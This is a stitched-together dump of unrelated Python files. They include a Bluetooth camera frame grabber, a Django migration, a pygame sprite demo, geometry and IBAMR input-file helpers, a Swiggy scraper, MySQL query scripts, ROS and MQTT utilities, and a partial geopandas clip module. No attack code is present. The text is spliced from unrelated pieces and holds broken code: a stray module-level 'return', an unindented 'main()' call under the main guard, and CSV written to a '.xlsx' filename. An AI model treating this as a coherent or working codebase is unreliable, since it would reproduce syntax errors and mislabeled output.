# numbered bitmap files (img-100.bmp .. img-199.bmp).
FRAME_WIDTH = 184
FRAME_HEIGHT = 120
picSize = FRAME_WIDTH * FRAME_HEIGHT  # bytes per complete frame

bluetooth = serial.Serial('COM7', 115200, timeout=1)
camBuffer = b''
dataNum = 0
offset = 100  # number of the first saved image
image = offset
receiveTime = time.process_time_ns()

while image < offset + 100:
    dataRead = bluetooth.inWaiting()
    if dataRead > 0:
        # More than a second of silence means the frame was truncated:
        # discard the partial buffer and start over.
        if time.process_time_ns() - receiveTime >= 1 * 1000 * 1000 * 1000:
            camBuffer = b''
            dataNum = 0
        camBuffer += bluetooth.read(dataRead)
        dataNum += dataRead
        receiveTime = time.process_time_ns()
        if dataNum >= picSize:
            print(image)
            winsound.Beep(440, 300)  # audible cue: frame complete
            img = Image.frombytes('L', (FRAME_WIDTH, FRAME_HEIGHT), camBuffer)
            name = "img-" + str(image).zfill(3) + ".bmp"
            img.save(name, "bmp")
            image = image + 1
            camBuffer = b''
            dataNum = 0

# Total CPU time in seconds.  (FIX: the original last line carried a stray
# '|' character that made the file a syntax error; an unused `data_time`
# variable was also removed.)
print(time.process_time_ns() / 1000 / 1000 / 1000)
# Generated by Django 2.2.1 on 2019-05-24 23:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make Board.content a TextField with empty default."""

    dependencies = [
        ('yb_app', '0002_board_iscomplete'),
    ]

    operations = [
        migrations.AlterField(
            model_name='board',
            name='content',
            field=models.TextField(default=''),
        ),
    ]
|
import random
import pygame
class MyFaceClass(pygame.sprite.Sprite):
    """A bouncing image sprite confined to a width x height window."""

    def __init__(self, image_file, location, width, height):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.image.load(image_file)
        self.rect = self.image.get_rect()
        self.rect.left, self.rect.top = location
        self.width = width
        self.height = height
        # current speed in pixels per move() call
        self.sx = 10
        self.sy = 10

    def move(self):
        """Advance by the current speed, then bounce off window edges."""
        self.rect = self.rect.move((self.sx, self.sy))
        self._change_speed()

    def _change_speed(self):
        """Reverse the horizontal/vertical speed when touching a window edge."""
        hit_horizontal = self.rect.left < 0 or self.rect.right > self.width
        hit_vertical = self.rect.top < 0 or self.rect.bottom > self.height
        if hit_horizontal:
            self.sx = -self.sx
        if hit_vertical:
            self.sy = -self.sy

    @staticmethod
    def _raise(x):
        """Scale x by a random factor in (-1, 1); currently unused."""
        scale = random.random() * 2 - 1
        return int(x * scale)
if __name__ == '__main__':
    # Window setup and a 3x3 grid of bouncing face sprites.
    width = 480
    height = 640
    size = (width, height)
    screen = pygame.display.set_mode(size)
    screen.fill([255, 255, 255])
    img_file = "red_face.jpg"
    faces = []
    num = 3
    for row in range(0, num):
        for column in range(0, num):
            location = [column * 180 + 10, row * 180 + 10]
            face = MyFaceClass(img_file, location, width, height)
            faces.append(face)
    for face in faces:
        screen.blit(face.image, face.rect)
    pygame.display.flip()
    # Keep the window alive until the user closes it.
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        pygame.time.delay(20)  # ~50 updates per second
        screen.fill([255, 255, 255])
        for face in faces:
            face.move()
            screen.blit(face.image, face.rect)
        pygame.display.flip()
    pygame.quit()
|
# remove comments
import numpy as np
import os
# rotate a vector by an angle theta around unit vector u
# u = []
def rotate3D(theta, unitVec, vector):
    """Rotate `vector` in place by angle theta (radians) about unitVec.

    Uses the Rodrigues rotation matrix; see
    https://en.wikipedia.org/wiki/Rotation_matrix
    """
    ux, uy, uz = unitVec[0], unitVec[1], unitVec[2]
    c = np.cos(theta)
    s = np.sin(theta)
    rot = [
        [c + ux * ux * (1 - c), ux * uy * (1 - c) - uz * s, ux * uz * (1 - c) + uy * s],
        [uy * ux * (1 - c) + uz * s, c + uy * uy * (1 - c), uy * uz * (1 - c) - ux * s],
        [uz * ux * (1 - c) - uy * s, uz * uy * (1 - c) + ux * s, c + uz * uz * (1 - c)],
    ]
    x, y, z = vector[0], vector[1], vector[2]
    for axis in range(3):
        vector[axis] = x * rot[axis][0] + y * rot[axis][1] + z * rot[axis][2]
    return
# return u cross v
def cross3D(u, v):
    """Return the cross product u x v as a 3-element list."""
    return [
        u[1] * v[2] - u[2] * v[1],
        u[2] * v[0] - u[0] * v[2],
        u[0] * v[1] - u[1] * v[0],
    ]
# angle between 2 vector u and v
def angleRad(u, v):
    """Return the angle in radians between vectors u and v (any dimension).

    Returns None when either vector has zero magnitude (original behavior,
    preserved for callers that test the result).
    """
    ndim = len(u)
    uv = 0
    # dot product
    for d in range(ndim):
        uv += u[d] * v[d]
    # squared magnitudes of u and v
    magU = 0
    magV = 0
    for d in range(ndim):
        magU += u[d] * u[d]
        magV += v[d] * v[d]
    if magU * magV != 0:
        costheta = uv / (np.sqrt(magU) * np.sqrt(magV))
        # FIX: clamp to [-1, 1] — rounding can push the cosine of nearly
        # (anti)parallel vectors just outside arccos's domain, giving NaN.
        costheta = min(1.0, max(-1.0, costheta))
        return np.arccos(costheta)
# normalize a vector
# work for 2D and 3D
def norm(u):
    """Normalize u to unit length in place; zero vectors are left untouched.

    Works for 2D and 3D (any dimension, in fact).
    """
    mag = 0.0
    for component in u:
        mag += component * component
    if mag == 0:
        return
    mag = np.sqrt(mag)
    for d in range(len(u)):
        u[d] /= mag
    return
# work for 2D and 3D
def distance(u, v):
    """Euclidean distance between points u and v (2D or 3D)."""
    total = 0
    for d in range(len(u)):
        diff = u[d] - v[d]
        total += diff * diff
    return np.sqrt(total)
# box = [[xlo, xhi],[ylo, yhi]]
def checkOutside(point, box):
    """Check whether a 2D point lies outside box = [[xlo, xhi], [ylo, yhi]].

    Returns (is_outside, [dx, dy]) where dx/dy are +1/-1 pointing back
    toward the box interior, or 0 when inside along that axis.
    """
    x, y = point[0], point[1]
    (xlo, xhi), (ylo, yhi) = box[0], box[1]
    dx = 0
    dy = 0
    if x < xlo:
        dx = 1
    if x > xhi:
        dx = -1
    if y < ylo:
        dy = 1
    if y > yhi:
        dy = -1
    return (dx, dy) != (0, 0), [dx, dy]
#get the first number in the fist line in file
def get_fist_num_infile(s_infile):
    """Return the first whitespace-separated token of the file as an int.

    (The 'fist' typo in the name is kept for backward compatibility.)
    """
    # FIX: `with` guarantees the handle is closed even when parsing raises;
    # the original leaked it on error.
    with open(s_infile, 'r') as h:
        return int(h.read().split()[0])
def remove_comment(txt):
    """Strip everything from the first comment marker ('#', '!' or '//') on."""
    for marker in ('#', '!', '//'):
        n = txt.find(marker)
        if n > -1:
            return txt[0:n]
    return txt


# Value-type codes accepted by read_from_input:
#   af = array of float      f = float       b = bool
#   i  = int                 s = string      aw = array of words
# ARG = filename, key, type  OR  filename, session, key, type
def read_from_input(*argc):
    """Look up `key` in a config file and convert its value.

    Lines have the form ``key = value...``; with 4 arguments, only lines
    inside the ``session { ... }`` region are searched.  Exits the process
    when the key is missing or the argument count is wrong.
    """
    narg = len(argc)
    file_name = argc[0]
    # FIX: close the file deterministically (the original leaked the handle).
    with open(file_name, 'r') as f:
        all_lines = f.readlines()
    if narg == 3:
        key = argc[1]
        val_type = argc[2]  # renamed: `type` shadowed the builtin
        lines = all_lines
    elif narg == 4:
        session = argc[1]
        key = argc[2]
        val_type = argc[3]
        lines = []
        found = False
        for aline in all_lines:
            if found:
                lines.append(aline)
            words = remove_comment(aline).split()
            if (len(words) > 0) and words[0] == session:
                found = True
            for w in words:
                if w == '}':
                    found = False
    else:
        print('read_from_input: INVALID ARGUMENTS')
        quit(1)
    for aline in lines:
        words = remove_comment(aline).split()
        if (len(words) > 2) and words[0] == key:
            if val_type in ('af', 'ArrayFloat'):
                af = []
                for c in words[2:]:
                    af.append(float(c.replace(",", "")))  # drop trailing commas
                return af
            elif val_type in ('f', 'Float'):
                return float(words[2])
            elif val_type in ('b', 'Bool'):
                s = words[2].lower()
                if s[0] == '"' or s[0] == "'":
                    w = s[1:-1]
                else:
                    w = s
                # BUG FIX: the original tested `w == 'y' or w == 'yes' or
                # 'true'`, which is always truthy, so every value was True.
                return w in ('y', 'yes', 'true')
            elif val_type in ('i', 'Int'):
                return int(words[2])
            elif val_type in ('s', 'String'):
                # remove leading and trailing quote characters if any
                s = ' '.join(words[2:])
                if s[0] == '"' or s[0] == "'":
                    return s[1:-1]
                else:
                    return s
            elif val_type in ('aw', 'ArrayWord'):
                # BUG FIX: the original condition `type == 'aw' or
                # 'ArrayWord'` was always true, making the final fallback
                # branch unreachable.
                arr = []
                for w in words[2:]:
                    wcut = ''
                    for ch in w:
                        if ch in ('"', "'", ','):
                            continue
                        wcut += ch
                    if wcut != '':
                        arr.append(wcut)
                return arr
            else:
                return words[2:]
    print('read_from_input: KEY %s NOT FOUND in %s' % (key, file_name))
    quit(1)
    return
def read_from_input2(s_file_name, s_key, s_subkey, s_type):
    """Read a value from a config file organised as `key { subkey = value }` blocks.

    s_key selects an outer block ('' looks s_subkey up at top level).
    s_type: 'f' -> float, 's' -> raw word list, 'lf' -> list of float.
    Exits the process on malformed files or unsupported types.
    """
    f = open(s_file_name, 'r')
    lines = f.readlines()
    outer_dict = {}
    print('FUNCTION: read_from_input')
    i = 0
    while i < len(lines):
        words = remove_comment(lines[i]).split()
        l = len(words)
        i += 1
        if l == 0: continue
        if l == 1:
            # a lone word opens a session block; '{' must start the next line
            key = words[0]
            # if the next line not starting by '{'
            # now i already points to the next line
            if lines[i][0] != '{':
                print('Error: invalid input file at line %d' % (i + 1))
                quit()
            else:
                i += 1
                inter_dict = {}
                # collect `name = value...` entries until the closing '}'
                while lines[i][0] != '}':
                    wo = remove_comment(lines[i]).split()
                    inter_dict[wo[0]] = wo[2:]
                    i += 1
                i += 1
                outer_dict[key] = inter_dict
        if l >= 3:
            # top-level `key = value...` line
            key = words[0]
            outer_dict[key] = words[2:]
    if s_key == '':
        ret = outer_dict[s_subkey]
    else:
        ret = outer_dict[s_key][s_subkey]
    if s_type == 'f':
        print('=' * 30)
        # NOTE(review): ret is a *list* of words here, and float(list)
        # raises TypeError -- looks like this expects a scalar; confirm.
        return float(ret)
    elif s_type == 's':
        print('=' * 30)
        return ret
    elif s_type == 'lf':
        l_ret = []
        for x in ret:
            l_ret.append(float(x))
        return l_ret
    else:
        print('Error: unsupported type: ', s_type)
        print('=' * 30)
        quit()
# ******************************************
# Distance between 2 identified vertices
# vertice should has from [x, y] as a list
# ******************************************
def distance2d(u, v):
    """Euclidean distance between two 2D points given as [x, y]."""
    dx = u[0] - v[0]
    dy = u[1] - v[1]
    return np.sqrt(dx * dx + dy * dy)
# domain = [Lx, Ly]
def distance2dPBC(u, v, domain, pbc):
    """2D distance with optional minimum-image wrapping.

    domain = [Lx, Ly]; when `pbc` is true, each component difference is
    folded into [-L/2, L/2] before the norm is taken.
    """
    dx = u[0] - v[0]
    dy = u[1] - v[1]
    if pbc:
        Lx, Ly = domain[0], domain[1]
        if dx > Lx / 2:
            dx -= Lx
        if dx < -Lx / 2:
            dx += Lx
        if dy > Ly / 2:
            dy -= Ly
        if dy < -Ly / 2:
            dy += Ly
    return np.sqrt(dx * dx + dy * dy)
# depth first search
def dfs(graph, start):
    """Return the set of vertices reachable from `start`.

    `graph` maps each vertex to a *set* of neighbours (set difference is
    used when extending the stack).
    """
    seen = set()
    pending = [start]
    while pending:
        node = pending.pop()
        if node in seen:
            continue
        seen.add(node)
        pending.extend(graph[node] - seen)
    return seen
# ******************************************
# displace set of points by a vector
# ******************************************
def displace(in_array, vector):
    """Shift every point of `in_array` (list of coordinate lists) by `vector`, in place."""
    if not in_array:
        return
    dims = len(in_array[0])
    for point in in_array:
        for axis in range(dims):
            point[axis] += vector[axis]
# ******************************************
# rotate set of Points by an angle theta radian
# ******************************************
def rotate2d(in_array_2d, angle):
    """Rotate 2D points in place by `angle` radians about the origin.

    Applies the rotation matrix [[cos, -sin], [sin, cos]] to each point.
    """
    c = np.cos(angle)
    s = np.sin(angle)
    for pt in in_array_2d:
        x, y = pt[0], pt[1]
        pt[0] = x * c - y * s
        pt[1] = x * s + y * c
def make_directory(directory):
    """Create `directory` (and any missing parents) if it does not exist.

    exist_ok=True closes the check-then-create race of the original
    os.path.exists() / os.makedirs() pair when several processes write to
    the same output tree.
    """
    os.makedirs(directory, exist_ok=True)
    return
# angle btw 2 vectors
def angle2d(first, middle, end):
    """Angle in degrees at `middle` formed by the points first-middle-end."""
    ux, uy = first[0] - middle[0], first[1] - middle[1]
    vx, vy = end[0] - middle[0], end[1] - middle[1]
    dot = ux * vx + uy * vy
    cosang = dot / (np.sqrt(ux * ux + uy * uy) * np.sqrt(vx * vx + vy * vy))
    # NOTE(review): like the original, degenerate (zero-length) legs divide
    # by zero and cosines just outside [-1, 1] are not clamped.
    return np.arccos(cosang) * 180.0 / np.pi
# work for list of [], that is [[],[]]
def shift_array2(in_array, n):
    """Return a new list of pairs with `n` added to both components of each
    element of `in_array` (a list of 2-element lists)."""
    return [[row[0] + n, row[1] + n] for row in in_array]
def save_to_file(list, filename, dirname):
    """Write rows of numbers to dirname/filename, one %g-formatted row per line.

    A two-line header records the generating script and the row count.
    No-op for an empty row list.  (The parameter name `list` shadows the
    builtin; kept so existing keyword callers keep working.)
    """
    if len(list) == 0:
        return
    make_directory(dirname)
    # `with` guarantees the handle is closed even if a row fails to format
    with open(dirname + '/' + filename, 'w') as f:
        f.write('# %s\n' % (os.path.basename(__file__)))
        f.write('# %d lines\n' % (len(list)))
        for row in list:
            for x in row:
                f.write('%g ' % x)
            f.write('\n')
    print('OutFile: %s' % filename)
    return
def plot_list(data, plottype, scale, title, legend, label, figname, dirname, showplot):
    """Plot column data to dirname/figname with matplotlib.

    `data` is a list of rows: column 0 is x, columns 1..n-1 are y-series.
    `scale` holds one divisor per column; `plottype` is 'SCATTER' or 'LINE'
    (anything else exits the process).  Shows the figure when `showplot`.
    """
    import matplotlib.pyplot as plt
    # scale = [x_scale, y_scale]
    if len(data) == 0:
        return
    make_directory(dirname)
    fig, ax = plt.subplots()
    x = []
    n = len(data[0])
    # print('n = %d' % n)
    # 1st col = x
    # 2nd col = y
    # nth col = yn
    y = []
    for i in range(n - 1):
        y.append([])
    # split rows into the x column and the (n - 1) scaled y-series
    for v in data:
        x.append(v[0]/scale[0])
        for i in range(n - 1):
            y[i].append(v[i + 1]/scale[i + 1])
    lines = []
    if plottype == 'SCATTER':
        for i in range(n - 1):
            ax.scatter(x, y[i], s=1, alpha=0.5)
            #ax.add_artist(legend[i])
    elif plottype == 'LINE':
        for i in range(n - 1):
            lines += ax.plot(x, y[i], marker='.', linestyle='-')
    else:
        print('plot_list::error::invalid plottype')
        quit()
    # NOTE(review): `lines` is empty for SCATTER plots, so the legend is
    # only attached to LINE plots -- confirm that is intended.
    ax.legend(lines[:], legend, loc='upper right', frameon=False)
    ylo = []
    yhi = []
    for i in range(n - 1):
        ylo.append(min(y[i]))
        yhi.append(max(y[i]))
    # pad the y-range by 10% on both sides
    ax.set(ylim=(1.1*min(ylo), 1.1*max(yhi)))
    #ax.set_aspect('equal')
    plt.title(title, color='green')
    plt.grid(True)
    plt.xlabel(label[0])
    plt.ylabel(label[1])
    plt.savefig(dirname + '/' + figname)
    if showplot:
        plt.show()
    plt.close()
    return
def cast_type(datType, dat):
    """Convert `dat` according to the type name in `datType`.

    'float'/'double' -> float, 'int' -> int, 'string' -> str; any other
    name returns `dat` unchanged.
    """
    converters = {
        'float': float,
        'double': float,
        'int': int,
        'string': str,
    }
    caster = converters.get(datType)
    return caster(dat) if caster is not None else dat
def save_points_file(points, s_format, text, dirname, filename):
    """Write `points` (m rows) to dirname/filename.

    The first line is "<row count> <text>"; each following line formats the
    row's columns with the printf-style codes in `s_format` (one code per
    column, e.g. ['g', '.3f']).  No-op when `points` is empty.
    """
    if len(points) == 0:
        return
    make_directory(dirname)
    m = len(points)
    num_column = len(points[0])
    # pre-build one '%<code> ' template per column
    fformat = ['%' + s_format[i] + ' ' for i in range(num_column)]
    # `with` closes the handle on all paths (the original leaked it, and
    # also re-checked for an empty list after already opening the file)
    with open(dirname + '/' + filename, 'w') as fout:
        fout.write('%i %s\n' % (m, text))
        for i in range(m):
            for col in range(num_column):
                fout.write(fformat[col] % (points[i][col]))
            fout.write('\n')
def plot_vertices_and_bonds(l_vertices, l_bonds, dirname, filename):
    """Scatter-plot vertices and draw each bond as a green segment.

    `l_vertices` is a list of [x, y]; `l_bonds` is a list of [i, j] index
    pairs into it.  Saves to dirname/filename.png when `filename` is
    non-empty, otherwise shows the figure interactively.
    """
    import matplotlib.pyplot as plt
    #print('-'*30)
    #print("FUNCTION: plot_vertices_and_bonds: ")
    fig, ax = plt.subplots()
    listx = []
    listy = []
    for v in l_vertices:
        listx.append(v[0])
        listy.append(v[1])
    # one line segment per bond, endpoints looked up by vertex index
    for b in l_bonds:
        v1 = b[0]
        v2 = b[1]
        x = [l_vertices[v1][0], l_vertices[v2][0]]
        y = [l_vertices[v1][1], l_vertices[v2][1]]
        ax.plot(x, y, linestyle ="solid", color = 'g', linewidth = 1)
    #scale = 1e-2*len(l_vertices)
    # marker size grows with the vertex count
    ax.scatter(listx, listy, color='b', alpha=0.9, s=5e-2 * len(l_vertices))
    ax.set_aspect('equal')
    plt.grid(True)
    if filename != '':
        make_directory(dirname)
        plt.savefig(dirname + '/' + filename + '.png')
    else:
        plt.show()
    plt.close()
    #print('=' * 30)
    return # // plot_sphere()
def make_input2d(botnames, anchornames, outfile):
    """Write an input2d fragment listing structures to `outfile`.

    `botnames` + `anchornames` become the quoted `structure_names` list,
    and each name gets its own `{ level_number ... }` sub-block.
    `botnames` must be non-empty (its first entry starts the quoted list).
    `with` guarantees the file is flushed and closed even on error.
    """
    with open(outfile, 'w') as f:
        f.write("\tposn_shift = 0.0, 0.0\n")
        f.write("\tmax_levels = MAX_LEVELS\n\n")
        f.write('\tstructure_names = ')
        f.write('"' + botnames[0] + '"')
        for name in (botnames[1:] + anchornames):
            f.write(', "' + name + '"')
        f.write('\n')
        for name in (botnames + anchornames):
            f.write("\n\t\t" + name + " { " + "\n")
            f.write("\t\t level_number = MAX_LEVELS - 1 " + "\n" +
                    "\t\t uniform_spring_stiffness = 0.0\n")
            f.write("\t\t}\n")
def read_xy_file(filename):
    """Read [x, y] float pairs from a text file.

    Comments are stripped with remove_comment(); lines with fewer than two
    tokens are skipped; extra columns beyond the first two are ignored.
    """
    # the original left the handle open until GC; read under a context manager
    with open(filename, 'r') as fh:
        lines = fh.readlines()
    vertices = []
    for line in lines:
        w = remove_comment(line).split()
        if len(w) <= 1:
            continue
        vertices.append([float(w[0]), float(w[1])])
    return vertices
def plot_vertices_list(list_vertices, point_sizes):
    """Scatter-plot several vertex groups, one matplotlib colour per group.

    `list_vertices` is a list of groups, each a list of [x, y] points;
    `point_sizes` is passed straight to scatter's `s=`.  Always shows the
    figure interactively (nothing is saved).
    """
    import matplotlib.pyplot as plt
    fig, ax = plt.subplots()
    for i in range(len(list_vertices)):
        vert = list_vertices[i]
        x = []
        y = []
        # cycle through matplotlib's 10 default colours C1..C10 (mod 10)
        color = 'C%d' % ((i + 1) % 10)
        #color = 'C%d' % (i + 1)
        for v in vert:
            x.append(v[0])
            y.append(v[1])
        #scale = 1e-2*len(l_vertices)
        ax.scatter(x, y, color=color, alpha=0.9, s=point_sizes)
    ax.set_aspect('equal')
    plt.grid(True)
    plt.show()
    plt.close()
    #print('=' * 30)
    return # // plot_sphere()
def triangle(in_vert):
    """Delaunay-triangulate 2D points.

    Returns (simplices, bonds): the triangle index array from scipy, and a
    list of unique neighbour pairs [k, kn] with kn > k.
    """
    from scipy.spatial import Delaunay
    tri = Delaunay(in_vert)
    indptr, neighbours = tri.vertex_neighbor_vertices
    bonds = [[k, kn]
             for k in range(len(in_vert))
             for kn in neighbours[indptr[k]:indptr[k + 1]]
             if kn > k]
    return tri.simplices, bonds
def polygon_area(points):
    """Area of the convex hull of 2D `points`.

    scipy's ConvexHull.volume is the enclosed area for 2D input.
    """
    from scipy.spatial import ConvexHull
    return ConvexHull(points).volume
def constraintib_database(*argc):
    """Write IBAMR `IBStandardInitializer` and `ConstraintIBKinematics`
    database blocks to a file.

    Positional args: (outfile, structure_names, trans_mom, rot_mom,
    lag_pos_update, centers[, bdry_name]).  When the optional 7th argument
    is given, an extra boundary structure with zeroed momenta and
    CONSTRAINT_VELOCITY updating is appended.
    """
    outfile = argc[0]
    structure_names = argc[1]
    trans_mom = argc[2]
    rot_mom = argc[3]
    lag_pos_update = argc[4]
    centers = argc[5]
    all_names = [name for name in structure_names]
    if len(argc) > 6:
        bdry_name = argc[6]
        all_names.append(argc[6])
    # IBStandardInitializer
    f = open(outfile, 'w')
    f.write('IBStandardInitializer {\n')
    f.write("\t max_levels = MAX_LEVELS\n")
    f.write("\t structure_names = ")
    # comma-separated quoted list; last entry gets a newline instead of ','
    for name in all_names[0:-1]:
        f.write('"' + name + '"' + ', ')
    f.write('"' + all_names[-1] + '"' + '\n')
    for name in all_names:
        f.write("\t " + name + " {\n")
        f.write("\t\tlevel_number = MAX_LEVELS - 1 \n" +
                "\t }\n")
    f.write("}\n\n")
    # ConstraintIBKinematics
    f.write('ConstraintIBKinematics {\n')
    id = 0
    for name in structure_names:
        f.write("\t " + name + " {\n")
        f.write('\t\tstructure_names = ' + '"' + name + '"\n')
        f.write("\t\tstructure_levels = MAX_LEVELS - 1\n")
        f.write("\t\tcalculate_translational_momentum = %d,%d,%d\n" % (trans_mom[0], trans_mom[1], trans_mom[2]))
        f.write("\t\tcalculate_rotational_momentum = %d,%d,%d\n" % (rot_mom[0], rot_mom[1], rot_mom[2]))
        f.write('\t\tlag_position_update_method = ' + '"' + lag_pos_update + '"\n')
        f.write('\t\ttagged_pt_identifier = MAX_LEVELS - 1, 0\n')
        # f.write('\t\tbody_mesh = BODY_MESH\n')
        f.write('\t\tradius_0 = RADIUS_LARGE\n')
        f.write('\t\tradius_1 = RADIUS_SMALL\n')
        f.write('\t\tamplitude = AMPLITUDE\n')
        f.write('\t\tfrequency = FREQUENCY\n')
        # one center_<j> line per center of this structure
        cent = centers[id]
        for j in range(len(cent)):
            f.write('\t\tcenter_%d = %g, %g\n' % (j, cent[j][0], cent[j][1]))
        f.write("\t }\n")
        id += 1
    # optional stationary boundary structure
    if len(argc) > 6:
        f.write("\t " + bdry_name + " {\n")
        f.write('\t\tstructure_names = ' + '"' + bdry_name + '"\n')
        f.write("\t\tstructure_levels = MAX_LEVELS - 1\n")
        f.write("\t\tcalculate_translational_momentum = 0, 0, 0\n")
        f.write("\t\tcalculate_rotational_momentum = 0, 0, 0\n")
        f.write('\t\tlag_position_update_method = \"CONSTRAINT_VELOCITY\"\n')
        f.write('\t\ttagged_pt_identifier = MAX_LEVELS - 1, 0\n')
        f.write("\t }\n")
    f.write("}\n")
    f.close()
    print('copy %s into input2d' % outfile)
return |
# Scrape Swiggy's Hyderabad "south indian" collection page and build a
# pandas table of restaurant name, items, rating and price.
import requests
from bs4 import BeautifulSoup
import pandas as pd
url = 'https://www.swiggy.com/hyderabad/south-indian-collection'
resp1 = requests.get(url)
print(resp1)
resp = resp1.content
soup = BeautifulSoup(resp, 'html.parser')
# each '_3FR5S' div is one restaurant card
soups = soup.find_all('div', class_='_3FR5S')
names = []
items = []
reatings = []
prices = []
offers = []
k = 1
for allin in soups:
    try:
        name = allin.find('div', class_='nA6kb')
        # print(k, '', 'name of restaurant :', name.text.strip())
        # NOTE(review): appends the Tag object, while every other column
        # below appends .text -- confirm the raw tag is intended here.
        names.append(name)
        item = allin.find('div', class_='_1gURR')
        # print('all items:', item.text)
        items.append(item.text)
        ratings = allin.find('div', class_='_9uwBC')
        # print('ratings:', ratings.text)
        reatings.append(ratings.text)
        price = allin.find('div', class_='nVWSi')
        # print('price:', price.text)
        prices.append(price.text)
        offer = allin.find('span', class_='sNAfh')
        # print('your ofers on itms is: ', offer)
        offers.append(offer.text)
    except:
        # NOTE(review): bare except skips any card with a missing field;
        # a card failing mid-way leaves the lists unequal in length, which
        # the DataFrame constructor below would reject.
        pass
    print('------')
    k += 1
    # NOTE(review): this continue is the last statement of the loop body,
    # so it has no effect -- possibly a leftover from debugging.
    if k == 2:
        continue
info = {'name': names, 'items': items, 'rating': reatings, 'price': prices}
data = pd.DataFrame(data=info)
print(data)
#print(data['items'])
print(data['name'].describe())
cd=data.to_csv('data.xlsx') |
import mysql.connector

# Connect to the local Test database and print every row of Test.Users.
conn = mysql.connector.connect(host='127.0.0.1', database='Test', user='root', password='gena')
mycursor = conn.cursor()
mycursor.execute('SELECT * FROM Test.Users')
result = mycursor.fetchall()
for (Id, Name, Email) in result:
    print (Id)
    print (Name + '/' + Email)
    print (Email)
# BUG FIX: `conn.close` only referenced the bound method without calling
# it, so the connection was never released; the parentheses were missing.
conn.close()
import pymysql
pymysql.install_as_MySQLdb()
# Run the same Test.Users dump through PyMySQL.
conn1 = pymysql.connect(host='127.0.0.1', database='Test', user='root', password='gena')
mycursor = conn1.cursor()
mycursor.execute('SELECT * FROM Test.Users')
result = mycursor.fetchall()
for (Id, Name, Email) in result:
    print (Id)
    print (Name + '/' + Email)
    print (Email)
# BUG FIX: `conn1.close` only referenced the bound method without calling
# it, so the connection was never released; the parentheses were missing.
conn1.close()
import rospkg
import subprocess
import os
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
print('\033[93mYOU NEED TO HAVE A ROSCORE RUNNING!\033[0m')
# Get the file path to the default pcd file created by smb_slam
mapPath = rospack.get_path('smb_slam') + '/compslam_map.pcd'
# Get the path to the script
smb_nav_path = rospack.get_path('smb_navigation')
script = smb_nav_path + '/script/pcd_to_gridmap.sh'
# Make the script executable (0o755 = rwxr-xr-x) without shelling out
os.chmod(script, 0o755)
# Set the arguments and run the script.  FIX: use subprocess.run with an
# argument list (shell=False) instead of os.system string concatenation --
# the old form broke on paths containing spaces, and `subprocess` was
# imported but never used.
output_path = smb_nav_path + '/data/test'
run_rviz = 'true'
subprocess.run([script, mapPath, output_path, run_rviz])
|
import paho.mqtt.client as MQTTClient
import time
import sys
import os
client = MQTTClient.Client()
HOST = 'gateway-pi.local'
PORT = 1883
HB_TOPIC = '/heart_beat'
def main():
    """Publish an MQTT heartbeat every second while a WSO2 process runs.

    Connects once to the broker (exiting the process on failure); then,
    each second, scans `ps -Af` for 'org.wso2.carbon' and publishes 'HB'
    on HB_TOPIC when at least one match is found.  Loops forever.
    """
    client.DEBUG = True
    try:
        client.connect(HOST, PORT)
    except Exception:
        print("Error while connecting to mqtt broker")
        sys.exit()
    print("Connected to {}".format(HOST))
    while True:
        # crude process check: count the WSO2 marker in the ps listing
        tmp = os.popen("ps -Af").read()
        proccount = tmp.count('org.wso2.carbon')
        if proccount > 0:
            print('sending HB')
            data = 'HB'
            client.publish(HB_TOPIC, str.encode(data))
        time.sleep(1)
if __name__ == '__main__':
main()
|
# Compare the in-source ("code") length of quoted string literals against
# their decoded ("real") length and print the total difference.
with open("inputData.txt", "r") as infile:
    lines = [ln.replace('\n', '').replace('\r', '') for ln in infile]

code_total = sum(len(ln) for ln in lines)
# strip the surrounding quotes, then resolve backslash escapes
real_total = sum(
    len(bytes(ln[1:-1], "utf-8").decode("unicode_escape")) for ln in lines
)
print(str(code_total - real_total))
|
"""
geopandas.clip
==============
A module to clip vector data using GeoPandas.
"""
import warnings
import numpy as np
import pandas as pd
from shapely.geometry import Polygon, MultiPolygon
from geopandas import GeoDataFrame, GeoSeries
from geopandas.array import _check_crs, _crs_mismatch_warn
def _clip_points(gdf, poly):
    """Clip point geometry to the polygon extent.

    Select the rows of `gdf` (a point GeoDataFrame or GeoSeries) whose
    geometry intersects `poly`, keeping their attributes.

    Parameters
    ----------
    gdf : GeoDataFrame, GeoSeries
        Point geometry to be clipped to poly.
    poly : (Multi)Polygon
        Reference geometry used to spatially clip the data.

    Returns
    -------
    GeoDataFrame
        The subset of gdf intersecting poly.
    """
    hits = gdf.sindex.query(poly, predicate="intersects")
    return gdf.iloc[hits]
def _clip_line_poly(gdf, poly):
    """Clip line and polygon geometry to the polygon extent.

    Candidate rows are pre-filtered with the spatial index, then their
    geometries are replaced by the intersection with `poly`, keeping all
    attributes.

    Parameters
    ----------
    gdf : GeoDataFrame, GeoSeries
        Line or polygon geometry that is clipped to poly.
    poly : (Multi)Polygon
        Reference polygon for clipping.

    Returns
    -------
    GeoDataFrame
        A clipped subset of gdf intersecting poly.
    """
    candidates = gdf.iloc[gdf.sindex.query(poly, predicate="intersects")]
    if isinstance(candidates, GeoDataFrame):
        clipped = candidates.copy()
        clipped[gdf.geometry.name] = candidates.intersection(poly)
        return clipped
    # GeoSeries input: intersection already yields the new series
    return candidates.intersection(poly)
def clip(gdf, mask, keep_geom_type=False):
    """Clip points, lines, or polygon geometries to the mask extent.
    Both layers must be in the same Coordinate Reference System (CRS).
    The `gdf` will be clipped to the full extent of the clip object.
    If there are multiple polygons in mask, data from `gdf` will be
    clipped to the total boundary of all polygons in mask.
    Parameters
    ----------
    gdf : GeoDataFrame or GeoSeries
        Vector layer (point, line, polygon) to be clipped to mask.
    mask : GeoDataFrame, GeoSeries, (Multi)Polygon
        Polygon vector layer used to clip `gdf`.
        The mask's geometry is dissolved into one geometric feature
        and intersected with `gdf`.
    keep_geom_type : boolean, default False
        If True, return only geometries of original type in case of intersection
        resulting in multiple geometry types or GeometryCollections.
        If False, return all resulting geometries (potentially mixed-types).
    Returns
    -------
    GeoDataFrame or GeoSeries
        Vector data (points, lines, polygons) from `gdf` clipped to
        polygon boundary from mask.
    Examples
    --------
    Clip points (global cities) with a polygon (the South American continent):
    >>> world = geopandas.read_file(
    ...     geopandas.datasets.get_path('naturalearth_lowres'))
    >>> south_america = world[world['continent'] == "South America"]
    >>> capitals = geopandas.read_file(
